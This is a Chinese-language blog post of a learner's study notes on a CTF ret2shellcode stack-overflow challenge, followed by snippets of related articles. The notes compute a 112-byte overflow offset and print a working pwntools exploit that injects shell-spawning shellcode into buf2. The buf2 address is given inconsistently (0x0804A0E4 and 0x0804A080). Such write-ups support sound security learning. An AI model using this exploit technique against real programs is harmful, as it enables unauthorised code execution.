ret2shellcode学习笔记 -- PWN学习笔记

最新推荐文章于 2024-07-18 08:56:58 发布
最新推荐文章于 2024-07-18 08:56:58 发布
阅读量325 收藏 1
点赞数
分类专栏: PWN学习笔记 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xindada559/article/details/117742895
版权

还是先IDA一下,看下反汇编的结果:

这里有gets()大概率会有栈溢出的情况,然后看左侧,没有vulnerable和get_shell,这是跟上一题最大的不同,但是先可以看看ebp等的动态执行情况:

跟上篇一样,输入八个A之后,出现

这里需要注意的一点,stack 24可能显示不出ebp那一行

所以stack 35 增大行数试试

可以看到eax存放的就是我们输入的gets(s)中的数据,而ebp就是我们所要溢出的位置

先借助python3 计算一下两者相差多少

可以发现两者相差108B,跟上题同样套路,还要加上4B的从ebp的再高一个位置的返回地址,即: 108+4 = 112B

所以总共要填充的是112B,但是这道题目中没有shellcode(个人理解是没有get_shell?)。所以要借助Python中的 

shellcraft.sh()
asm(shellcraft.sh())

而IDA中的那句: strncpy(buf2, &s, 0x64u);

是我们可以借助的,因为代码的功能是将s中的0x64u(也就是100B)复制到buf2中,所以我们可以将返回地址处填充上buf2的地址(这边没太明白┭┮﹏┭┮)

所以才有了:buf2 = 0x0804A0E4

buf2 = 0x0804A0E4
payload = asm(shellcraft.sh()).ljust(112,b'a')

其中ljust(112,b'a') 是python3的一个函数用来填充a至112B数据

from pwn import*
io = process('./ret2shellcode')
buf2 = 0x0804A080
payload = asm(shellcraft.sh()).ljust(112,b'a')
payload += p32(buf2)
io.sendline(payload)
io.interactive()

执行结果:

这样就相当于获得了shell

pwn ret2shellcode
young‘s blog
02-08 1697
写在前面,记录一些小知识和一些文章 对于checksec后几个参数的具体研究: checksec及其包含的保护机制 (原博客图已经挂了,只能用简书的了) pwntools介绍(刚开始看不懂英文文档可以看这个): pwntools pwntools使用简介 文件执行时权限不够使用命令为: chmod +x start.sh 当堆栈开启了保护的时候,我们不能够直接将shellcode覆盖到堆栈中执行,...
pwn学习笔记 BUU
2301_79525044的博客
01-11 586
本来配完20和22以后以为自己已经会配基本的环境了,结果18又让我看到了很多新的问题。搜出来的文章大部分都没用,找到有用的文章也忘记保存了,以后如果有缘要重新配环境应该会吃很多亏。之前一直没有做笔记,现在开始正式进入寒假学习。这Ubuntu18的问题比20和22多好多,不停的报错,报错方式不停地变,已经麻了。刚回家,一堆事要搞,没学什么,主要还是配环境。
pwn栈溢出学习 基本ROP——ret2shellcode
MrTreebook的博客
11-22 1073
ret2shellcode 目录ret2shellcode1.checksec看一下2.IDA pro看一下 1.checksec看一下 32位的文件 什么保护都没开,并且有可读,可写,可执行段 2.IDA pro看一下 gets函数读入一个 s 然后把 s 复制到 buf2
Ret2ShellCode
钞sir的博客
01-24 8356
红颜祸 千般柔情 相思难解两相若 蝶恋花 几经浮沉 枯骨终是化飞沙 简介 ret2shellcode顾名思义,就是return to shellcode,即让程序中某个函数执行结束后,返回到shellcode的地址去执行shellcode,得到system(sh)的效果;ret2shellcode是栈溢出中一种简单而且常规的操作,当配合ROP等技术的使用后,非常有用 利用条件 ret2shel...
ret2shellcode
我多么希望明天有太阳,来灼烧我腐烂的梦想
08-12 990
start bin: https://pwnable.tw/challenge/#1 gdb-peda$ checksec CANARY : disabled FORTIFY : disabled NX : ENABLED PIE : disabled RELRO : disabled 反汇编 .text:08048060 ...
pwn学习笔记(一)
qq_41560595的博客
03-18 1643
ret2text: 程序中提供了后门函数,自己复写返回地址为后门函数地址。 .bss 、.data、.text三个段是elf文件在磁盘上本来就有的文件,进入到内存后仍然存在。PIE影响这三个部分。
PWN学习笔记(一)Basic Rop
weixin_44120526的博客
12-26 370
学习笔记主要基于CTF WIKI 中的Basic rop部分。 网址为:https://wiki.x10sec.org/pwn/linux/stackoverflow/basic-rop/ -------------------------------------------------------------------- 首先翻译了一下文章的开头,内容为: 打开NX保护后,很难继续直接将代码注入堆栈或堆中。攻击者也提出了相应的绕过保护的方法。目前最主要的是面向返回的程序设计。主要思想是基于堆栈.
学习笔记】CTF PWN选手的养成(二)
prettyX的博客
11-25 1940
第三章 漏洞利用技术 课时1 栈溢出-这些都是套路 0X01 基础知识 1、寄存器:rsp/esp、rbp/ebp等 2、栈: 3、函数调用:call、ret 4、调用约定: __stdcall、__cdecl、__fastcall、__thiscall、__nakedcall、__pascal 5、参数传递:取决于调用约定,默认如下 X86从右向左入栈 X64优先寄存器,参数过...
SROP 学习笔记
Assassin
05-14 971
文章目录一、基本介绍二、signal 机制三、攻击原理四、SROP chain的构造五、关于利用六、例题讲解 本文只是学习的记录文章,主要是以CTF wiki为主,然后加上例题讲解。 一、基本介绍 SROP(Sigreturn Oriented Programming) 于 2014 年被 Vrije Universiteit Amsterdam 的 Erik Bosman 提出,其相关研究Framing Signals — A Return to Portable Shellcode发表在安全顶级会议
pwn学习入门详解PPT
04-17
包括Windows内核学习,格式化字符串,栈溢出等方面
栈溢出实例--笔记二(ret2shellcode
一只青木呀
08-01 2068
栈溢出实例--笔记二(ret2shellcode)1、栈溢出含义及栈结构2、ret2shellcode基本思路3、实战一下3.1、二进制程序如下3.2、分析调试查看栈3.3、编写payload获取shell3.4、操作结果 1、栈溢出含义及栈结构 请参考栈溢出实例–笔记一(ret2text) 2、ret2shellcode基本思路 ret2shellcode需要我们控制程序执行shellcode代码。即ret2shellcode的目标就是在栈上写入布局好的shellcode,利用ret-address返回到
Ret2ShellCode详解
Sakura给爷pwn全场
10-24 420
StackOverFlow之Ret2ShellCode详解: https://www.freebuf.com/vuls/179724.html https://www.jianshu.com/p/7dad572adae9
Pwn基础知识
最新发布
2301_80798825的博客
07-18 657
32位架构中有4GB的物理内存,当执行文件时,会出现一个或多个4GB的虚拟内存,但是实际上程序所占有的空间通常很小,所以执行的程序的总空间不超过4GB的时候可以出现多个虚拟内存。是自己的(不同的)剩余的1GB是内核空间,是共享的。shellcode :调用攻击目标的shell的代码,shell是一个提供用户与操作系统交互的命令行接口,有zsh,sh,bash。Stack : 动态存储区,程序栈,用来管理函数调用的状态。64位架构中128TB是内核空间,128TB是用户空间,剩下的是未被定义的空间。
pwn的一些基础知识
v_3483608762的博客
07-14 188
大佬总结的基础知识
字符串溢出(pwn溢出)--ret2shellcode
莫慌的博客
09-26 2180
pwn 入门
PWN基础知识总结
丰年留客的专栏
03-29 1667
0x00 Intro 这里记录一些在CTF PWN类题目经常要考虑的技术点,是一些与C/ASM相关,比较底层的东西。总结来说有: C和汇编之间的参数传递 栈的细节 64位程序参数传递 只有对这些细节都清楚了,那么利用时,如何构造Payload就没有想象中那么困难了。这里目前还是只限于x86-64架构。 0x01 C和汇编之间的参数传递 有编译器基础的都知道,GCC将C语言编译为机器语言中间有几个过程。 预处理(将宏展开) 汇编(将C代码转为汇编代码) 编译(将汇编转为机器码) 链接(将静态库,多个源文
pwn基础知识笔记
月阴荒的博客
02-20 2418
算是总的开一篇文章,把学到的知识总结一下,之后会重复写到各个文章里面 checksec指令, 用来查询pwn题目的壳和保护,并且能够看到程序的信息 1.Canary保护 参考链接:https://blog.csdn.net/weixin_44540286/article/details/101629735?utm_source=distribute.pc_relevant.none-task Ca...
ctf——pwn堆的基础知识
m0_64195960的博客
04-24 3273
1前言 一、笔者想说 笔者是一个不大聪明的pwn的新手,这是我根据《ctf权威竞赛指南》,b站课程,一些师傅的博客,ctfviki做的笔记,便于学习和复习 如果有错误的地方还请给位师傅指正 二、调试 下面所展示的gdb调试是根据一下调试的 注意: 1、调试记得执行到malloc后再去查看 2、记得编译 一、glibc堆概述 1)堆概述 堆是程序虚拟内存中由低地址向高地址增长的线性区域,出于效率和页对齐的考虑,通常会分配相当大的连续内存。程序再次申请时便会从这片内存中分配,直到堆空间
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值